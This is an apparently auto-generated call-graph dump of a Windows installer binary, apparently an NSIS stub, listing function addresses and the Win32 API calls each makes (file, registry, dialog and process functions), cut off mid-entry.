API calls 3825->3826 3827 401a82 3826->3827 3828 406559 72 API calls 3827->3828 3828->3824 3829 402648 3830 40154d 19 API calls 3829->3830 3831 402652 3830->3831 3832 401446 18 API calls 3831->3832 3833 40265c 3832->3833 3834 402684 RegEnumValueW 3833->3834 3835 402678 RegEnumKeyW 3833->3835 3837 401721 3833->3837 3836 40269d 3834->3836 3834->3837 3835->3836 3836->3837 3838 4025b6 RegCloseKey 3836->3838 3838->3837 3839 4026c8 3840 40145c 18 API calls 3839->3840 3841 4026d0 3840->3841 3846 4058fe GetFileAttributesW CreateFileW 3841->3846 3843 4026dc 3847 4059ff wsprintfW 3843->3847 3845 402c58 3846->3843 3847->3845 3848 403ec9 3849 403f02 3848->3849 3850 403ed9 3848->3850 3852 403952 8 API calls 3849->3852 3851 4038c7 19 API calls 3850->3851 3853 403ee6 SetDlgItemTextW 3851->3853 3854 403f0e 3852->3854 3853->3849 3855 401cc9 3856 401d26 3855->3856 3857 401cd6 3855->3857 3858 401d49 GlobalAlloc 3856->3858 3859 401d2a 3856->3859 3861 4060ca 18 API calls 3857->3861 3862 401cf3 3857->3862 3860 4060ca 18 API calls 3858->3860 3871 401721 3859->3871 3874 405ab8 lstrcpynW 3859->3874 3860->3871 3861->3862 3872 405ab8 lstrcpynW 3862->3872 3864 401d3c GlobalFree 3864->3871 3867 401d08 3873 405ab8 lstrcpynW 3867->3873 3869 401d17 3875 405ab8 lstrcpynW 3869->3875 3872->3867 3873->3869 3874->3864 3875->3871 3876 403acb 3877 403af7 3876->3877 3878 403adb 3876->3878 3880 403b2a 3877->3880 3881 403afd SHGetPathFromIDListW 3877->3881 3887 405731 GetDlgItemTextW 3878->3887 3882 403b14 SendMessageW 3881->3882 3883 403b0d 3881->3883 3882->3880 3885 40141d 2 API calls 3883->3885 3884 403ae8 SendMessageW 3884->3877 3885->3882 3887->3884 3888 4029cb 3889 4029d3 3888->3889 3891 4018b2 3888->3891 3890 4029e0 FindNextFileW 3889->3890 3890->3891 3892 4029ef 3890->3892 3894 405ab8 lstrcpynW 3892->3894 3894->3891 3895 401acc 3896 40145c 18 API calls 3895->3896 3897 401ad4 lstrlenW 3896->3897 3898 402c51 3897->3898 3901 4059ff wsprintfW 3898->3901 3900 402c58 3901->3900 3902 4043cd 3903 4043f2 3902->3903 3904 4043db 3902->3904 3906 404400 IsWindowVisible 3903->3906 3912 404417 3903->3912 3905 4043e1 3904->3905 3920 40445b 3904->3920 3907 403937 SendMessageW 3905->3907 3909 40440d 3906->3909 3906->3920 3910 4043eb 3907->3910 3908 404461 CallWindowProcW 3908->3910 3921 40434f SendMessageW 3909->3921 3912->3908 3926 405ab8 lstrcpynW 3912->3926 3914 404446 3927 4059ff wsprintfW 3914->3927 3916 40444d 3917 40141d 2 API calls 3916->3917 3918 404454 3917->3918 3928 405ab8 lstrcpynW 3918->3928 3920->3908 3922 404372 GetMessagePos ScreenToClient SendMessageW 3921->3922 3923 4043ac SendMessageW 3921->3923 3924 4043a4 3922->3924 3925 4043a9 3922->3925 3923->3924 3924->3912 3925->3923 3926->3914 3927->3916 3928->3920 3929 4016ce 3930 4016d7 3929->3930 3932 4016ec 3929->3932 3931 4016e9 ShowWindow 3930->3931 3930->3932 3931->3932 3933 402350 3934 40145c 18 API calls 3933->3934 3935 402357 3934->3935 3936 40145c 18 API calls 3935->3936 3937 402361 3936->3937 3938 40145c 18 API calls 3937->3938 3939 40236b 3938->3939 3940 405b98 2 API calls 3939->3940 3941 402373 3940->3941 3942 402385 lstrlenW lstrlenW 3941->3942 3944 404a73 25 API calls 3941->3944 3946 402c58 3941->3946 3943 404a73 25 API calls 3942->3943 3945 4023c4 SHFileOperationW 3943->3945 3944->3941 3945->3941 3945->3946 3947 4017d3 3948 40145c 18 API calls 3947->3948 3949 4017db 3948->3949 3950 40145c 18 API calls 3949->3950 3951 4017e5 3950->3951 3952 40145c 18 API calls 3951->3952 3953 4017ef MoveFileW 3952->3953 3954 4017ac 3953->3954 3955 4017ff 3953->3955 3957 401435 25 API calls 3954->3957 3959 401721 3954->3959 3956 405b98 2 API calls 3955->3956 3955->3959 3958 40180f 3956->3958 3957->3959 3958->3959 3960 406526 42 API calls 3958->3960 3960->3954 3550 4018d7 3551 40145c 18 API calls 3550->3551 3552 4018df 3551->3552 3553 401905 3552->3553 3554 4018fd 3552->3554 3590 405ab8 lstrcpynW 3553->3590 3589 405ab8 lstrcpynW 3554->3589 3557 401903 3561 405ae7 5 API calls 3557->3561 3558 401910 3559 405fe6 3 API calls 3558->3559 3560 401916 lstrcatW 3559->3560 3560->3557 3571 401922 3561->3571 3562 405b98 2 API calls 3562->3571 3563 4058de 2 API calls 3563->3571 3565 40193e CompareFileTime 3565->3571 3566 4019f8 3567 404a73 25 API calls 3566->3567 3570 401a02 3567->3570 3568 404a73 25 API calls 3587 4019e4 3568->3587 3569 405ab8 lstrcpynW 3569->3571 3572 402ee7 33 API calls 3570->3572 3571->3562 3571->3563 3571->3565 3571->3566 3571->3569 3576 4060ca 18 API calls 3571->3576 3584 40574d MessageBoxIndirectW 3571->3584 3586 4019cf 3571->3586 3588 4058fe GetFileAttributesW CreateFileW 3571->3588 3573 401a17 3572->3573 3574 401a2b SetFileTime 3573->3574 3575 401a3a FindCloseChangeNotification 3573->3575 3574->3575 3577 401a4b 3575->3577 3575->3587 3576->3571 3578 401a50 3577->3578 3579 401a63 3577->3579 3580 4060ca 18 API calls 3578->3580 3581 4060ca 18 API calls 3579->3581 3582 401a58 lstrcatW 3580->3582 3583 401a6b 3581->3583 3582->3583 3585 40574d MessageBoxIndirectW 3583->3585 3584->3571 3585->3587 3586->3568 3586->3587 3588->3571 3589->3557 3590->3558 3961 4023d8 3962 401ce5 3961->3962 3965 4023e3 3961->3965 3963 4060ca 18 API calls 3962->3963 3964 401cf3 3963->3964 3971 405ab8 lstrcpynW 3964->3971 3967 401d08 3972 405ab8 lstrcpynW 3967->3972 3969 401d17 3973 405ab8 lstrcpynW 3969->3973 3971->3967 3972->3969 3973->3965 3974 401e59 3975 401446 18 API calls 3974->3975 3976 401e61 3975->3976 3977 401446 18 API calls 3976->3977 3978 401e6a GetDlgItem 3977->3978 3979 402c51 3978->3979 3982 4059ff wsprintfW 3979->3982 3981 402c58 3982->3981 3983 40285a 3984 402860 3983->3984 3985 402873 3983->3985 3986 401446 18 API calls 3984->3986 3987 40145c 18 API calls 3985->3987 3990 402868 3986->3990 3988 40287b lstrlenW 3987->3988 3988->3990 3989 401721 3990->3989 3991 40289f WriteFile 3990->3991 3991->3989 3992 40385e 3993 403869 3992->3993 3994 403870 GlobalAlloc 3993->3994 3995 40386d 3993->3995 3994->3995 3996 403bde 3997 403be8 3996->3997 3998 403beb lstrcpynW lstrlenW 3996->3998 3997->3998 3999 401adf 4000 401446 18 API calls 3999->4000 4001 401ae7 4000->4001 4002 401446 18 API calls 4001->4002 4003 401af2 4002->4003 4004 40145c 18 API calls 4003->4004 4005 401afc 4004->4005 4006 401b11 lstrlenW 4005->4006 4011 401b4a 4005->4011 4007 401b1b 4006->4007 4007->4011 4012 405ab8 lstrcpynW 4007->4012 4009 401b33 4010 401b40 lstrlenW 4009->4010 4009->4011 4010->4011 4012->4009 4013 401661 SetForegroundWindow 4014 402c58 4013->4014 4015 401be3 4016 401446 18 API calls 4015->4016 4017 401bea 4016->4017 4018 401446 18 API calls 4017->4018 4019 401aae 4018->4019 4020 401b68 4021 40145c 18 API calls 4020->4021 4022 401b70 4021->4022 4023 40145c 18 API calls 4022->4023 4024 401b7a 4023->4024 4025 401b82 lstrcmpiW 4024->4025 4026 401b98 lstrcmpW 4024->4026 4027 401aae 4025->4027 4026->4027 4028 401f6c 4029 401446 18 API calls 4028->4029 4030 401f73 4029->4030 4031 401446 18 API calls 4030->4031 4032 401f7d 4031->4032 4033 401f90 EnableWindow 4032->4033 4034 401f85 ShowWindow 4032->4034 4035 402c58 4033->4035 4034->4035 4036 4023ee 4037 4023f9 4036->4037 4040 402400 4036->4040 4038 40145c 18 API calls 4037->4038 4038->4040 4039 402411 4041 402421 4039->4041 4043 40145c 18 API calls 4039->4043 4040->4039 4042 40145c 18 API calls 4040->4042 4044 40145c 18 API calls 4041->4044 4042->4039 4043->4041 4045 40242b WritePrivateProfileStringW 4044->4045 4046 40166f 4047 401678 4046->4047 4049 40168c 4046->4049 4048 401446 18 API calls 4047->4048 4048->4049 4050 40276f 4051 401446 18 API calls 4050->4051 4053 402779 4051->4053 4052 4027b0 ReadFile 4052->4053 4059 402811 4052->4059 4053->4052 4054 402813 4053->4054 4055 4027da MultiByteToWideChar 4053->4055 4056 402823 4053->4056 4053->4059 4060 4059ff wsprintfW 4054->4060 4055->4053 4055->4056 4058 40283f SetFilePointer 4056->4058 4056->4059 4058->4059 4060->4059 4061 4026ef GlobalAlloc 4062 402717 4061->4062 4063 402708 4061->4063 4065 40145c 18 API calls 4062->4065 4064 401446 18 API calls 4063->4064 4068 402710 4064->4068 4066 40271f WideCharToMultiByte lstrlenA 4065->4066 4066->4068 4067 402760 4068->4067 4069 402755 WriteFile 4068->4069 4069->4067 4070 401ef0 GetDC GetDeviceCaps 4071 401446 18 API calls 4070->4071 4072 401f0d MulDiv 4071->4072 4073 401446 18 API calls 4072->4073 4074 401f23 4073->4074 4075 4060ca 18 API calls 4074->4075 4076 401f5c CreateFontIndirectW 4075->4076 4077 402c51 4076->4077 4080 4059ff wsprintfW 4077->4080 4079 402c58 4080->4079 4081 4029f1 4082 40145c 18 API calls 4081->4082 4083 4029f9 FindFirstFileW 4082->4083 4084 402a0c 4083->4084 4086 402a1d 4084->4086 4089 4059ff wsprintfW 4084->4089 4090 405ab8 lstrcpynW 4086->4090 4088 402a2a 4089->4086 4090->4088 4091 403b74 4092 403bd1 4091->4092 4093 403b81 lstrcpynA lstrlenA 4091->4093 4093->4092 4094 403bb2 4093->4094 4094->4092 4095 403bbe GlobalFree 4094->4095 4095->4092 4096 401d76 4097 401446 18 API calls 4096->4097 4098 401d7e 4097->4098 4099 401446 18 API calls 4098->4099 4100 401d89 4099->4100 4101 401d9a 4100->4101 4102 40145c 18 API calls 4100->4102 4103 401dab 4101->4103 4104 40145c 18 API calls 4101->4104 4102->4101 4105 401db4 4103->4105 4106 401dff 4103->4106 4104->4103 4108 401446 18 API calls 4105->4108 4107 40145c 18 API calls 4106->4107 4109 401e07 4107->4109 4110 401dbc 4108->4110 4111 40145c 18 API calls 4109->4111 4112 401446 18 API calls 4110->4112 4113 401e11 FindWindowExW 4111->4113 4114 401dc6 4112->4114 4118 401e31 4113->4118 4115 401dd0 SendMessageTimeoutW 4114->4115 4116 401def SendMessageW 4114->4116 4115->4118 4116->4118 4117 402c58 4118->4117 4120 4059ff wsprintfW 4118->4120 4120->4117 4121 401e76 4122 401446 18 API calls 4121->4122 4123 401e87 SetWindowLongW 4122->4123 4124 402c58 4123->4124 4125 4024f8 4126 4024fc 4125->4126 4127 40145c 18 API calls 4126->4127 4128 40251d 4127->4128 4129 40145c 18 API calls 4128->4129 4130 402528 RegCreateKeyExW 4129->4130 4131 402554 4130->4131 4132 402c58 4130->4132 4133 402570 4131->4133 4134 40145c 18 API calls 4131->4134 4135 40257d 4133->4135 4137 401446 18 API calls 4133->4137 4136 402566 lstrlenW 4134->4136 4138 402599 RegSetValueExW 4135->4138 4139 402ee7 33 API calls 4135->4139 4136->4133 4137->4135 4140 4025b0 RegCloseKey 4138->4140 4139->4138 4140->4132 4142 402979 4143 40296c 4142->4143 4143->4142 4144 401446 18 API calls 4143->4144 4145 40298e 4144->4145 4146 402995 SetFilePointer 4145->4146 4147 4029a6 4146->4147 4148 402c58 4146->4148 4150 4059ff wsprintfW 4147->4150 4150->4148 4151 401a7b 4152 401a7d 4151->4152 4153 40145c 18 API calls 4152->4153 4154 401a82 4153->4154 4155 406559 72 API calls 4154->4155 4156 401a8b 4155->4156 4157 40447d GetDlgItem GetDlgItem 4158 4044d3 7 API calls 4157->4158 4163 4046eb 4157->4163 4159 404577 DeleteObject 4158->4159 4160 40456b SendMessageW 4158->4160 4161 404582 4159->4161 4160->4159 4164 4045b9 4161->4164 4166 4060ca 18 API calls 4161->4166 4162 4047d0 4165 404875 4162->4165 4175 40481f SendMessageW 4162->4175 4200 4046de 4162->4200 4163->4162 4173 40434f 5 API calls 4163->4173 4187 40475b 4163->4187 4169 4038c7 19 API calls 4164->4169 4167 40488a 4165->4167 4168 40487e SendMessageW 4165->4168 4171 40459b SendMessageW SendMessageW 4166->4171 4178 4048a3 4167->4178 4179 40489c ImageList_Destroy 4167->4179 4185 4048b3 4167->4185 4168->4167 4174 4045cd 4169->4174 4170 403952 8 API calls 4177 404a6c 4170->4177 4171->4161 4172 4047c2 SendMessageW 4172->4162 4173->4187 4180 4038c7 19 API calls 4174->4180 4176 404834 SendMessageW 4175->4176 4175->4200 4182 404847 4176->4182 4183 4048ac GlobalFree 4178->4183 4178->4185 4179->4178 4184 4045de 4180->4184 4181 404a1d 4186 404a32 ShowWindow GetDlgItem ShowWindow 4181->4186 4181->4200 4191 404858 SendMessageW 4182->4191 4183->4185 4188 4046ab GetWindowLongW SetWindowLongW 4184->4188 4194 40463a SendMessageW 4184->4194 4195 4046a5 4184->4195 4198 404668 SendMessageW 4184->4198 4199 40467c SendMessageW 4184->4199 4185->4181 4190 40141d 2 API calls 4185->4190 4202 4048e5 4185->4202 4186->4200 4187->4162 4187->4172 4189 4046c5 4188->4189 4192 4046e3 4189->4192 4193 4046cb ShowWindow 4189->4193 4190->4202 4191->4165 4209 403920 SendMessageW 4192->4209 4208 403920 SendMessageW 4193->4208 4194->4184 4195->4188 4195->4189 4198->4184 4199->4184 4200->4170 4201 4049f4 InvalidateRect 4201->4181 4203 404a0a 4201->4203 4204 404913 SendMessageW 4202->4204 4205 404929 4202->4205 4210 403f13 4203->4210 4204->4205 4205->4201 4207 4049a2 SendMessageW SendMessageW 4205->4207 4207->4205 4208->4200 4209->4163 4211 403f33 4210->4211 4212 4060ca 18 API calls 4211->4212 4213 403f73 4212->4213 4214 4060ca 18 API calls 4213->4214 4215 403f7e 4214->4215 4216 4060ca 18 API calls 4215->4216 4217 403f8e lstrlenW wsprintfW SetDlgItemTextW 4216->4217 4217->4181 4218 40207d 4219 40145c 18 API calls 4218->4219 4220 402085 4219->4220 4221 405b98 2 API calls 4220->4221 4222 40208b 4221->4222 4223 40209a 4222->4223 4227 4059ff wsprintfW 4222->4227 4228 4059ff wsprintfW 4223->4228 4226 402c58 4227->4223 4228->4226 4229 4015fd 4230 401605 4229->4230 4231 404a73 25 API calls 4229->4231 4231->4230 4232 401ffe 4233 40145c 18 API calls 4232->4233 4234 402005 4233->4234 4235 404a73 25 API calls 4234->4235 4236 40200f 4235->4236 4237 4056ec 2 API calls 4236->4237 4238 402015 4237->4238 4239 401721 4238->4239 4240 402026 WaitForSingleObject 4238->4240 4244 402066 CloseHandle 4238->4244 4242 402038 4240->4242 4243 40204a GetExitCodeProcess 4242->4243 4246 405bf6 2 API calls 4242->4246 4243->4244 4245 40205d 4243->4245 4244->4239 4249 4059ff wsprintfW 4245->4249 4247 40203f WaitForSingleObject 4246->4247 4247->4242 4249->4244 4250 401000 4251 401037 BeginPaint GetClientRect 4250->4251 4252 40100c DefWindowProcW 4250->4252 4254 4010fc 4251->4254 4255 401182 4252->4255 4256 401073 CreateBrushIndirect FillRect DeleteObject 4254->4256 4257 401105 4254->4257 4256->4254 4258 401170 EndPaint 4257->4258 4259 40110b CreateFontIndirectW 4257->4259 4258->4255 4259->4258 4260 40111b 6 API calls 4259->4260 4260->4258 4261 401707 4262 40145c 18 API calls 4261->4262 4263 40170f SetFileAttributesW 4262->4263 4264 401721 4263->4264 4265 40400b 4266 40404c 4265->4266 4267 40403f 4265->4267 4269 404055 GetDlgItem 4266->4269 4274 4040b8 4266->4274 4326 405731 GetDlgItemTextW 4267->4326 4271 404069 4269->4271 4270 404046 4273 405ae7 5 API calls 4270->4273 4276 40407d SetWindowTextW 4271->4276 4281 405807 4 API calls 4271->4281 4272 40419f 4324 404334 4272->4324 4328 405731 GetDlgItemTextW 4272->4328 4273->4266 4274->4272 4277 4060ca 18 API calls 4274->4277 4274->4324 4279 4038c7 19 API calls 4276->4279 4283 404131 SHBrowseForFolderW 4277->4283 4278 4041cb 4284 406042 18 API calls 4278->4284 4285 40409b 4279->4285 4280 403952 8 API calls 4286 404348 4280->4286 4282 404073 4281->4282 4282->4276 4290 405fe6 3 API calls 4282->4290 4283->4272 4287 404149 CoTaskMemFree 4283->4287 4288 4041d1 4284->4288 4289 4038c7 19 API calls 4285->4289 4291 405fe6 3 API calls 4287->4291 4329 405ab8 lstrcpynW 4288->4329 4292 4040a9 4289->4292 4290->4276 4293 404156 4291->4293 4327 403920 SendMessageW 4292->4327 4296 40418d SetDlgItemTextW 4293->4296 4301 4060ca 18 API calls 4293->4301 4296->4272 4297 4040b1 4299 405bbf 3 API calls 4297->4299 4298 4041e8 4300 405bbf 3 API calls 4298->4300 4299->4274 4302 4041f0 4300->4302 4303 404175 lstrcmpiW 4301->4303 4304 404231 4302->4304 4311 406015 2 API calls 4302->4311 4313 404286 4302->4313 4303->4296 4306 404186 lstrcatW 4303->4306 4330 405ab8 lstrcpynW 4304->4330 4306->4296 4307 40423a 4308 405807 4 API calls 4307->4308 4309 404240 GetDiskFreeSpaceW 4308->4309 4312 404264 MulDiv 4309->4312 4309->4313 4311->4302 4312->4313 4314 4042e3 4313->4314 4316 403f13 21 API calls 4313->4316 4315 404306 4314->4315 4317 40141d 2 API calls 4314->4317 4331 40390d EnableWindow 4315->4331 4318 4042d4 4316->4318 4317->4315 4320 4042e5 SetDlgItemTextW 4318->4320 4321 4042d9 4318->4321 4320->4314 4323 403f13 21 API calls 4321->4323 4322 404322 4322->4324 4332 4038e9 4322->4332 4323->4314 4324->4280 4326->4270 4327->4297 4328->4278 4329->4298 4330->4307 4331->4322 4333 4038f7 4332->4333 4334 4038fc SendMessageW 4332->4334 4333->4334 4334->4324 3610 40188d 3611 40145c 18 API calls 3610->3611 3612 401895 SearchPathW 3611->3612 3613 4018b2 3612->3613 3633 40248e 3634 4024c0 3633->3634 3635 402494 3633->3635 3636 40145c 18 API calls 3634->3636 3646 40154d 3635->3646 3638 4024c8 3636->3638 3650 401497 RegOpenKeyExW 3638->3650 3639 40249b 3642 40145c 18 API calls 3639->3642 3645 401721 3639->3645 3643 4024ad RegDeleteValueW RegCloseKey 3642->3643 3643->3645 3647 40155e 3646->3647 3648 40145c 18 API calls 3647->3648 3649 401585 RegOpenKeyExW 3648->3649 3649->3639 3657 4014c3 3650->3657 3658 40150f 3650->3658 3651 4014e9 RegEnumKeyW 3652 4014fb RegCloseKey 3651->3652 3651->3657 3654 405bbf 3 API calls 3652->3654 3653 401520 RegCloseKey 3653->3658 3656 40150b 3654->3656 3655 401497 3 API calls 3655->3657 3656->3658 3659 40153b RegDeleteKeyW 3656->3659 3657->3651 3657->3652 3657->3653 3657->3655 3658->3645 3659->3658 4335 401610 4336 40161b PostQuitMessage 4335->4336 4337 401605 4335->4337 4336->4337 4338 401a90 4339 40145c 18 API calls 4338->4339 4340 401a98 4339->4340 4341 40574d MessageBoxIndirectW 4340->4341 4342 401721 4341->4342 3151 403415 #17 SetErrorMode OleInitialize 3223 405bbf GetModuleHandleA 3151->3223 3155 403483 GetCommandLineW 3228 405ab8 lstrcpynW 3155->3228 3157 403495 GetModuleHandleW 3158 4034ad 3157->3158 3159 4057b3 CharNextW 3158->3159 3160 4034bc CharNextW 3159->3160 3174 4034ce 3160->3174 3161 403566 3162 403585 GetTempPathW 3161->3162 3229 403360 3162->3229 3164 40359b 3165 4035c3 DeleteFileW 3164->3165 3166 40359f GetWindowsDirectoryW lstrcatW 3164->3166 3237 40311b GetTickCount GetModuleFileNameW 3165->3237 3168 403360 11 API calls 3166->3168 3167 4057b3 CharNextW 3167->3174 3170 4035bb 3168->3170 3170->3165 3172 403650 3170->3172 3171 4035d7 3171->3172 3175 4057b3 CharNextW 3171->3175 3208 403640 3171->3208 3320 4033eb 3172->3320 3174->3161 3174->3167 3180 403568 3174->3180 3185 4035ee 3175->3185 3178 403756 3181 4037d9 3178->3181 3183 405bbf 3 API calls 3178->3183 3179 403669 3327 40574d 3179->3327 3331 405ab8 lstrcpynW 3180->3331 3187 403765 3183->3187 3188 403618 3185->3188 3189 40367f lstrcatW lstrcmpiW 3185->3189 3190 405bbf 3 API calls 3187->3190 3332 406042 3188->3332 3189->3172 3192 40369b CreateDirectoryW SetCurrentDirectoryW 3189->3192 3193 40376e 3190->3193 3194 4036b3 3192->3194 3195 4036be 3192->3195 3197 405bbf 3 API calls 3193->3197 3348 405ab8 lstrcpynW 3194->3348 3349 405ab8 lstrcpynW 3195->3349 3201 403777 3197->3201 3200 4036cc 3350 405ab8 lstrcpynW 3200->3350 3204 4037c5 ExitWindowsEx 3201->3204 3210 403785 GetCurrentProcess 3201->3210 3204->3181 3207 4037d2 3204->3207 3205 403635 3347 405ab8 lstrcpynW 3205->3347 3359 40141d 3207->3359 3265 4053f8 3208->3265 3212 403795 3210->3212 3211 4060ca 18 API calls 3213 4036f4 DeleteFileW 3211->3213 3212->3204 3214 403701 CopyFileW 3213->3214 3220 4036db 3213->3220 3214->3220 3215 40374a 3216 406526 42 API calls 3215->3216 3218 403751 3216->3218 3218->3172 3219 4060ca 18 API calls 3219->3220 3220->3211 3220->3215 3220->3219 3222 403735 CloseHandle 3220->3222 3351 406526 3220->3351 3356 4056ec CreateProcessW 3220->3356 3222->3220 3224 405be4 GetProcAddress 3223->3224 3225 405bd9 LoadLibraryA 3223->3225 3226 403458 SHGetFileInfoW 3224->3226 3225->3224 3225->3226 3227 405ab8 lstrcpynW 3226->3227 3227->3155 3228->3157 3230 405ae7 5 API calls 3229->3230 3232 40336c 3230->3232 3231 403376 3231->3164 3232->3231 3362 405fe6 lstrlenW CharPrevW 3232->3362 3235 40592d 2 API calls 3236 403392 3235->3236 3236->3164 3365 4058fe GetFileAttributesW CreateFileW 3237->3365 3239 40315b 3240 40316b 3239->3240 3366 405ab8 lstrcpynW 3239->3366 3240->3171 3242 403181 3367 406015 lstrlenW 3242->3367 3246 403192 GetFileSize 3247 4031a9 3246->3247 3262 40328e 3246->3262 3247->3240 3253 403351 3247->3253 3261 402e3a 6 API calls 3247->3261 3247->3262 3372 402e9e ReadFile 3247->3372 3249 403297 3249->3240 3251 4032d3 GlobalAlloc 3249->3251 3407 402ed0 SetFilePointer 3249->3407 3385 402ed0 SetFilePointer 3251->3385 3256 402e3a 6 API calls 3253->3256 3255 4032b4 3258 402e9e ReadFile 3255->3258 3256->3240 3257 4032ee 3386 402ee7 3257->3386 3260 4032bf 3258->3260 3260->3240 3260->3251 3261->3247 3374 402e3a 3262->3374 3263 4032fa 3263->3240 3263->3263 3264 403328 SetFilePointer 3263->3264 3264->3240 3266 405bbf 3 API calls 3265->3266 3267 40540e 3266->3267 3268 405414 3267->3268 3269 405426 3267->3269 3433 4059ff wsprintfW 3268->3433 3270 405981 3 API calls 3269->3270 3271 405457 3270->3271 3273 405476 lstrcatW 3271->3273 3275 405981 3 API calls 3271->3275 3274 405424 3273->3274 3424 4039fc 3274->3424 3275->3273 3278 406042 18 API calls 3279 4054a7 3278->3279 3280 405543 3279->3280 3282 405981 3 API calls 3279->3282 3281 406042 18 API calls 3280->3281 3283 40554e 3281->3283 3284 4054d9 3282->3284 3285 40555e LoadImageW 3283->3285 3286 4060ca 18 API calls 3283->3286 3284->3280 3289 4054fe lstrlenW 3284->3289 3293 4057b3 CharNextW 3284->3293 3287 405613 3285->3287 3288 405589 RegisterClassW 3285->3288 3286->3285 3292 40141d 2 API calls 3287->3292 3290 40561d 3288->3290 3291 4055ce SystemParametersInfoW CreateWindowExW 3288->3291 3294 405532 3289->3294 3295 40550c lstrcmpiW 3289->3295 3290->3172 3291->3287 3296 405619 3292->3296 3297 4054f9 3293->3297 3299 405fe6 3 API calls 3294->3299 3295->3294 3298 40551c GetFileAttributesW 3295->3298 3296->3290 3302 4039fc 19 API calls 3296->3302 3297->3289 3301 405528 3298->3301 3300 405538 3299->3300 3434 405ab8 lstrcpynW 3300->3434 3301->3294 3305 406015 2 API calls 3301->3305 3303 40562a 3302->3303 3306 405636 ShowWindow LoadLibraryW 3303->3306 3307 4056bc 3303->3307 3305->3294 3308 405655 LoadLibraryW 3306->3308 3309 40565c GetClassInfoW 3306->3309 3435 404b48 OleInitialize 3307->3435 3308->3309 3311 405689 DialogBoxParamW 3309->3311 3312 40566f GetClassInfoW RegisterClassW 3309->3312 3314 40141d 2 API calls 3311->3314 3312->3311 3313 4056c2 3315 4056c6 3313->3315 3316 4056de 3313->3316 3318 4056b1 3314->3318 3315->3290 3319 40141d 2 API calls 3315->3319 3317 40141d 2 API calls 3316->3317 3317->3290 3318->3290 3319->3290 3321 403403 3320->3321 3322 4033f5 CloseHandle 3320->3322 3450 40380b 3321->3450 3322->3321 3328 405762 3327->3328 3329 403677 ExitProcess 3328->3329 3330 405778 MessageBoxIndirectW 3328->3330 3330->3329 3331->3162 3502 405ab8 lstrcpynW 3332->3502 3334 406053 3503 405807 CharNextW CharNextW 3334->3503 3337 405ae7 5 API calls 3343 406069 3337->3343 3338 4060a2 lstrlenW 3339 4060a9 3338->3339 3338->3343 3341 405fe6 3 API calls 3339->3341 3340 405b98 2 API calls 3340->3343 3342 4060af GetFileAttributesW 3341->3342 3344 403626 3342->3344 3343->3338 3343->3340 3343->3344 3345 406015 2 API calls 3343->3345 3344->3172 3346 405ab8 lstrcpynW 3344->3346 3345->3338 3346->3205 3347->3208 3348->3195 3349->3200 3350->3220 3352 405bbf 3 API calls 3351->3352 3353 40652d 3352->3353 3355 40654e 3353->3355 3509 40635b lstrcpyW 3353->3509 3355->3220 3357 405727 3356->3357 3358 40571b CloseHandle 3356->3358 3357->3220 3358->3357 3360 40139b 2 API calls 3359->3360 3361 401432 3360->3361 3361->3181 3363 406003 lstrcatW 3362->3363 3364 40337e CreateDirectoryW 3362->3364 3363->3364 3364->3235 3365->3239 3366->3242 3368 406024 3367->3368 3369 403187 3368->3369 3370 40602a CharPrevW 3368->3370 3371 405ab8 lstrcpynW 3369->3371 3370->3368 3370->3369 3371->3246 3373 402ebf 3372->3373 3373->3247 3375 402e43 3374->3375 3376 402e5b 3374->3376 3377 402e53 3375->3377 3378 402e4c DestroyWindow 3375->3378 3379 402e63 3376->3379 3380 402e6b GetTickCount 3376->3380 3377->3249 3378->3377 3408 405bf6 3379->3408 3382 402e79 CreateDialogParamW ShowWindow 3380->3382 3383 402e9c 3380->3383 3382->3383 3383->3249 3385->3257 3387 402f02 3386->3387 3388 402f2f 3387->3388 3412 402ed0 SetFilePointer 3387->3412 3390 402e9e ReadFile 3388->3390 3391 402f3a 3390->3391 3392 402f53 GetTickCount 3391->3392 3393 4030ae 3391->3393 3399 402f3e 3391->3399 3396 402fa0 3392->3396 3392->3399 3394 4030b2 3393->3394 3395 4030d6 3393->3395 3397 402e9e ReadFile 3394->3397 3395->3399 3400 402e9e ReadFile 3395->3400 3401 4030f5 WriteFile 3395->3401 3398 402e9e ReadFile 3396->3398 3396->3399 3403 402ff2 GetTickCount 3396->3403 3404 403017 MulDiv wsprintfW 3396->3404 3406 40305b WriteFile 3396->3406 3397->3399 3398->3396 3399->3263 3400->3395 3401->3399 3402 403109 3401->3402 3402->3395 3402->3399 3403->3396 3413 404a73 3404->3413 3406->3396 3406->3399 3407->3255 3409 405c13 PeekMessageW 3408->3409 3410 402e69 3409->3410 3411 405c09 DispatchMessageW 3409->3411 3410->3249 3411->3409 3412->3388 3414 404a8c 3413->3414 3423 404b30 3413->3423 3415 404aaa lstrlenW 3414->3415 3416 4060ca 18 API calls 3414->3416 3417 404ad3 3415->3417 3418 404ab8 lstrlenW 3415->3418 3416->3415 3420 404ae6 3417->3420 3421 404ad9 SetWindowTextW 3417->3421 3419 404aca lstrcatW 3418->3419 3418->3423 3419->3417 3422 404aec SendMessageW SendMessageW SendMessageW 3420->3422 3420->3423 3421->3420 3422->3423 3423->3396 3425 403a10 3424->3425 3442 4059ff wsprintfW 3425->3442 3427 403a84 3428 4060ca 18 API calls 3427->3428 3429 403a90 SetWindowTextW 3428->3429 3430 403aab 3429->3430 3431 403ac6 3430->3431 3432 4060ca 18 API calls 3430->3432 3431->3278 3432->3430 3433->3274 3434->3280 3443 403937 3435->3443 3437 404b92 3438 403937 SendMessageW 3437->3438 3440 404ba4 OleUninitialize 3438->3440 3439 404b6b 3439->3437 3446 40139b 3439->3446 3440->3313 3442->3427 3444 403940 SendMessageW 3443->3444 3445 40394f 3443->3445 3444->3445 3445->3439 3448 4013a2 3446->3448 3447 401410 3447->3439 3448->3447 3449 4013dd MulDiv SendMessageW 3448->3449 3449->3448 3452 403819 3450->3452 3451 403408 3454 406559 3451->3454 3452->3451 3453 40381e FreeLibrary GlobalFree 3452->3453 3453->3451 3453->3453 3455 406042 18 API calls 3454->3455 3456 40656c 3455->3456 3457 406577 DeleteFileW 3456->3457 3458 40658e 3456->3458 3488 403414 OleUninitialize 3457->3488 3459 4066df 3458->3459 3494 405ab8 lstrcpynW 3458->3494 3459->3488 3499 405b98 FindFirstFileW 3459->3499 3461 4065b6 3462 4065c2 lstrcatW 3461->3462 3463 4065cc 3461->3463 3464 4065d2 3462->3464 3465 406015 2 API calls 3463->3465 3467 4065e2 lstrcatW 3464->3467 3468 4065d8 3464->3468 3465->3464 3470 4065ea lstrlenW FindFirstFileW 3467->3470 3468->3467 3468->3470 3475 4066ce 3470->3475 3491 406611 3470->3491 3471 405fe6 3 API calls 3473 4066fb 3471->3473 3472 4057b3 CharNextW 3472->3491 3474 4058de 2 API calls 